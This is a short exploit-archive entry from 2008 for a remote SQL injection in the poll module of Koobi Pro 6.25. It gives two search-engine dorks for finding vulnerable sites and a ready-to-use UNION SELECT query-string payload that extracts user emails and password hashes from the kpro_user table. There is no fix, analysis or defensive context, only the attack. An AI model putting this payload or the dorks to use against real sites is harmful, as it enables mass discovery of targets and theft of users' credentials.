id: 2882
date: 04/13/2008
title: Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
author: S@BUN
cves: 

======================================================
Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
======================================================




##########################################
#
# Koobi Pro 6.25 poll Remote SQL Injection Vulnerability
#
###########################################
#
# DORK 1 : allinurl: "index.php?p=poll"showresult
#
# DORK 2 : allinurl: poll_id "showresult"
#
###########################################
EXPLOiT :

index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+kpro_user

*********************************************




#  0day.today [2023-03-22]  #